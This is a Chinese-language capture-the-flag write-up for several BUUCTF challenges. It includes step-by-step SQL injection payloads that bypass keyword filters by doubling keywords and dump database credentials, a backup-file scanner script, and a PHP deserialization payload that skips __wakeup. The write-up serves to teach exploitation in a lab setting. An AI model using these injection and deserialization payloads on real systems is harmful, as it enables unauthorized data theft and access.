目录
[极客大挑战 2019]BabySQL
[极客大挑战 2019]PHP
神秘龙卷风
假如给我三天光明
后门查杀
webshell后门
[极客大挑战 2019]BabySQL
1.
发现存在sql注入
2.使用bp用fuzz字典爆破一下哪些词被过滤了,发现or,select等都被过滤了
尝试双写注入
3.查看列数:1' ununionion selselectect 1,2,3#
4.爆数据库
1' ununionion selselectect 1,2,database()#
5.爆表名
1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
6.爆字段
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
7,查看字段,爆数据
1' ununionion selselectect 1,2,group_concat(concat_ws('~',username,passwoorrd)) frfromom geek.b4bsql#
8.查看页面源代码
[极客大挑战 2019]PHP
1.使用御剑没有扫出来,用找的py脚本。。。
import requests
url1 = 'http://f2cd8c7d-4068-4ccb-8c5a-184bb1d299d2.node4.buuoj.cn:81/' # url为被扫描地址
# 常见的网站源码备份文件名 同目录下创建List.txt 如web,website,backup,back,www,wwwroot,temp等
# with open('List1.txt', 'r') as f:
# list1 = f.read().splitlines()
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# 常见的网站源码备份文件后缀
list2 = ['tar', 'tar.gz', 'zip', 'rar', '7-zip', '7z']
for i in list1:
for j in list2:
back = str(i) + '.' + str(j)
url = str(url1) + '/' + back
print(back + ' ', end='')
print(requests.get(url).status_code)扫描得到www.zip
url后跟上/www.zip,下载得到文件
查看index.php
//index.php
<!DOCTYPE html>
<head>
<meta charset="UTF-8">
<title>I have a cat!</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel="stylesheet" href="style.css">
</head>
<style>
#login{
position: absolute;
top: 50%;
left:50%;
margin: -150px 0 0 -150px;
width: 300px;
height: 300px;
}
h4{
font-size: 2em;
margin: 0.67em 0;
}
</style>
<body>
<div id="world">
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!
</div>
<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?> //页面可以传进一个参数select然后把它反序列化,反序列化的过程中会用到class.php
</div>
<div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script src="index.js"></script>
</body>
</html>
class.php
//class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
如果想要输出flag,username绝对等于admin,password要弱等于100,不然的话就会在上面的判断里被die。
再往上看到,wakeup函数里会把我们的username赋值为guest。因为wakeup函数是在__destruct函数之前运行的。wakeup()函数: 与__sleep()函数相反,__sleep()函数,是在序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。这个__wakeup()函数有个漏洞就是当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。所以我们要绕过它。要绕过__wakeup只要让说明的参数个数大于实际的参数个数就行了
经过分析,已经确定需要提交的参数是 select,而且提交的值是经过序列化之后的值,username=‘admin’,password=‘100’ 才能过。
而且我们要调用到__destruct()并且password=100,username=admin才能echo $flag
怎么调用到它呢?其实在反序列化脚本结束时会自动调用它,它是unserialize()结束的魔术方法(魔法函数) 参考php魔法函数_TuudOp的博客-CSDN博客php魔法函数_TuudOp的博客-CSDN博客
<?php
class Name{
private $username='admin';
private $password='100';
}
$n=new Name();
echo(serialize($n)); //序列化
?>
PHP——serialize()序列化类变量public、protected、private的区别_序列化private_Ho1aAs的博客-CSDN博客还要PHP的private(私有类)的反序列化:变量名前添加标记PHP——serialize()序列化类变量public、protected、private的区别_序列化private_Ho1aAs的博客-CSDN博客
构造payload:
O:4:"Name":3:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";i:100;}
但是这个payload是在URL上提交的话。会因为编码问题,在传递\00的时候会丢失。截断符可以用%00代替,所以这里需要把\00改成%00。所以最后得到的payload为:
?select=O:4:"Name":3{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
神秘龙卷风
1.下载文件,一个有密码的压缩文件
2.根据题目四位数,使用archpr,爆破得到密码
3.打开txt文件
4。查找资料得知这是brainfuck代码,在线解密得到flag
假如给我三天光明
1.下载的图片最后一行有一排盲文。。 
使用盲文对照表
得出密码为kmdonowg。
解密得到一个音频文件,使用audacity分析
长的一段是-,短的一段是.然后结合摩斯密码表就得到了答案
flag{wpei08732?23dz}
后门查杀
扫描,定位后门位置
包裹得到flag
webshell后门
用windows安全系统扫描一下,打开member文件夹下的zp.zip
